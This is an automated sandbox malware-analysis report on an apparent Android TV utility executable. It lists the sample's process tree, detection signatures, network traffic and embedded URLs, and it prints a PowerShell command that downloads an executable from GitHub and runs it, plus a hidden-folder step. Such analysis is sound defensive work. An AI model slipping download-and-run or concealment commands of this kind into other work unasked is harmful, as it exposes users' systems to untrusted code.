Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Android TV Tools v3_ES.exe

Overview

General Information

Sample name:Android TV Tools v3_ES.exe
Analysis ID:1447534
MD5:66773f373de9e1aa11b3f2e6f74967af
SHA1:cf366b0155f9ab7a2376191120e91bd241f2da8b
SHA256:0010eec766b8e255d945d0c5ed3ca892329892c4a106988159a26f8758b52282
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Android TV Tools v3_ES.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\Android TV Tools v3_ES.exe" MD5: 66773F373DE9E1AA11B3F2E6F74967AF)
    • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1852 cmdline: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 3304 cmdline: C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • attrib.exe (PID: 6196 cmdline: attrib +h C:\Users\user\AppData\Local\Temp\ytmp MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6564 cmdline: C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 3008 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • PING.EXE (PID: 5708 cmdline: ping google.com -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • powershell.exe (PID: 4080 cmdline: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmdmax.exe (PID: 5252 cmdline: "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999 MD5: 34348DD557468D401AE4BFAE2E850EEE)
  • svchost.exe (PID: 6360 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Sigma detected: Local Accounts Discovery
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", CommandLine: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Users\user\Desktop\Android TV Tools v3_ES.exe, ParentProcessId: 1896, ParentProcessName: Android TV Tools v3_ES.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder", ProcessId: 1852, ProcessName: cmd.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'", ProcessId: 4080, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6360, ProcessName: svchost.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Android TV Tools v3_ES.exeVirustotal: Detection: 13%Perma Link
Source: Android TV Tools v3_ES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox ViewASN Name: GITHUBUS GITHUBUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMTUser-Agent: Microsoft BITS/7.8Host: github.com
Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/50417431/6e51c424-c3ca-11e5-97ed-aaf014dfa1f3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240525%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240525T185903Z&X-Amz-Expires=300&X-Amz-Signature=fff4a0719c293d9eda64204276fdc932c8a5e83c54ec30c201cfc9b24ace8e09&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=50417431&response-content-disposition=attachment%3B%20filename%3Dcmdmax-x86.exe&response-content-type=application%2Foctet-stream HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 08 Dec 2021 04:12:16 GMTUser-Agent: Microsoft BITS/7.8Host: objects.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
Source: tmp8939.bat.0.drString found in binary or memory: http://agrd.io/tvapk
Source: svchost.exe, 0000000C.00000002.3240453687.000001C0DF210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: tmp8939.bat.0.drString found in binary or memory: https://9to5google.com/guides/android-tv/
Source: tmp8939.bat.0.drString found in binary or memory: https://adguard.com/adguard-android-tv/overview.html
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/0x192/universal-android-debloater/releases
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/Genymobile/scrcpy/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/K3V1991/ADB-and-FastbootPlusPlus/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/codefaktor/FTVLaunchX/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/mirfatif/PermissionManagerX/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/realOxy/M3UAndroid/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://api.github.com/repos/spocky/miproja1/releases/latest
Source: tmp8939.bat.0.drString found in binary or memory: https://apkins.aptoide.com/AptoideTV-5.1.2.apk
Source: tmp8939.bat.0.drString found in binary or memory: https://atvlauncher.trekgonewild.de/
Source: tmp8939.bat.0.drString found in binary or memory: https://f-droid.org/repo/news.androidtv.launchonboot_12.apk
Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000C.00000003.2009056822.000001C0DEFA0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000C.00000002.3240453687.000001C0DF200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/0x192/universal-android-debloater#universal-android-debloater-gui
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/0x192/universal-android-debloater/releases/download/%ver_debloater%/uad_gui-windo
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/0x192/universal-android-debloater/wiki/FAQ
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/Free-TV/IPTV?tab=readme-ov-file#free-tv
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/Genymobile/scrcpy
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/Genymobile/scrcpy/blob/master/doc/shortcuts.md#shortcuts
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/Genymobile/scrcpy/releases/download/%ver_scrcpy%/scrcpy-win%arquitectura_windows%
Source: Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drString found in binary or memory: https://github.com/K3V1991/ADB-and-FastbootPlusPlus
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/K3V1991/ADB-and-FastbootPlusPlus/releases/download/%ver_adb%/ADB-and-Fastboot
Source: svchost.exe, 0000000C.00000002.3240662557.000001C0DF2C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/c50
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/codefaktor/FTVLaunchX/blob/develop/README.md
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/codefaktor/FTVLaunchX/releases/download/v1.0.1/FTVLaunchX-1.0.1.apk
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/iptv-org/iptv?tab=readme-ov-file#playlists
Source: tmp8939.bat.0.drString found in binary or memory: https://github.com/mirfatif/PermissionManagerX/releases/download/%ver_PMX%/PMX_%ver_PMX%.apk
Source: svchost.exe, 0000000C.00000002.3240579838.000001C0DF295000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3239974063.000001C0DA302000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drString found in binary or memory: https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe
Source: edb.log.12.drString found in binary or memory: https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exeAC:
Source: svchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com:443/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe
Source: tmp8939.bat.0.drString found in binary or memory: https://gitlab.com/AuroraOSS/AuroraStore/uploads/ac32503aee88c6d1067dad57f3f92e09/AuroraStore_4.3.5.
Source: tmp8939.bat.0.drString found in binary or memory: https://gitlab.com/flauncher/flauncher/-/releases/0.18.0/downloads/flauncher-0.18.0.apk
Source: tmp8939.bat.0.drString found in binary or memory: https://ipinfo.io
Source: tmp8939.bat.0.drString found in binary or memory: https://iptv-org.github.io/
Source: tmp8939.bat.0.drString found in binary or memory: https://kutt.it/stn_beta
Source: tmp8939.bat.0.drString found in binary or memory: https://kutt.it/stn_bridge_amazon
Source: tmp8939.bat.0.drString found in binary or memory: https://kutt.it/stn_bridge_atv
Source: tmp8939.bat.0.drString found in binary or memory: https://kutt.it/stn_stable
Source: tmp8939.bat.0.drString found in binary or memory: https://mirfatif.github.io/PermissionManagerX/
Source: tmp8939.bat.0.drString found in binary or memory: https://mirfatif.github.io/PermissionManagerX/help/en/
Source: svchost.exe, 0000000C.00000002.3240662557.000001C0DF2D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3240579838.000001C0DF295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
Source: svchost.exe, 0000000C.00000002.3240662557.000001C0DF2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3239974063.000001C0DA302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/50417431/6e51c424-c3ca-
Source: svchost.exe, 0000000C.00000002.3240579838.000001C0DF260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com:443
Source: qmgr.db.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=%%%%j
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=ar.tvplayer.tv
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.neilturner.aerialviews
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.tdtchannels.player
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.wiseplay
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=flar2.homebutton
Source: tmp8939.bat.0.drString found in binary or memory: https://play.google.com/store/apps/details?id=org.xbmc.kodi
Source: tmp8939.bat.0.drString found in binary or memory: https://smarttubeapp.github.io/
Source: tmp8939.bat.0.drString found in binary or memory: https://www.adslzone.net/reportajes/tv-streaming/que-es-tecnologia-iptv/#395576-que-son-las-listas-i
Source: tmp8939.bat.0.drString found in binary or memory: https://www.androidpolice.com/2021/01/30/how-to-remap-remote-buttons-take-screenshot-chromecast-with
Source: tmp8939.bat.0.drString found in binary or memory: https://www.androidtv-guide.com/
Source: tmp8939.bat.0.drString found in binary or memory: https://www.reddit.com/r/AndroidTV/
Source: Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drString found in binary or memory: https://www.reddit.com/r/AndroidTV/comments/1ajkxbk/tool_allinone_tool_for_windows_android_tv_tools_
Source: tmp8939.bat.0.drString found in binary or memory: https://www.tdtchannels.com/listas
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/aapt-arm-pie-zip.6053069/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/countries-list-txt.6067313/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/google-installer_3-0-apk.6052043/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/google-play-apk.6050959/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/google-play-store_v38-7-29-apk.6052033/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/google-tv-home_1-0-591121582-apk.6051727/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/attachments/wifi-pro-ftp-server_v1-9-5-build-74-apk.5924749/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/c/android-tv.4276/
Source: tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/t/how-to-prepare-smartwatch-for-advanced-functions.4511103/
Source: Android TV Tools v3_ES.exe, 00000000.00000002.3239472165.0000000001484000.00000004.00000020.00020000.00000000.sdmp, tmp8939.bat.0.drString found in binary or memory: https://xdaforums.com/t/tool-all-in-one-tool-for-windows-android-tv-tools-v2.4648239/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_0040A05E0_2_0040A05E
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_0040C1E50_2_0040C1E5
Source: Android TV Tools v3_ES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal88.troj.evad.winEXE@23/14@3/4
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\Android TV Tools - Aux FilesJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeFile created: C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.batJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
Source: Android TV Tools v3_ES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Android TV Tools v3_ES.exeVirustotal: Detection: 13%
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeFile read: C:\Users\user\Desktop\Android TV Tools v3_ES.exeJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_14-1734
Source: unknownProcess created: C:\Users\user\Desktop\Android TV Tools v3_ES.exe "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping google.com -n 1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999
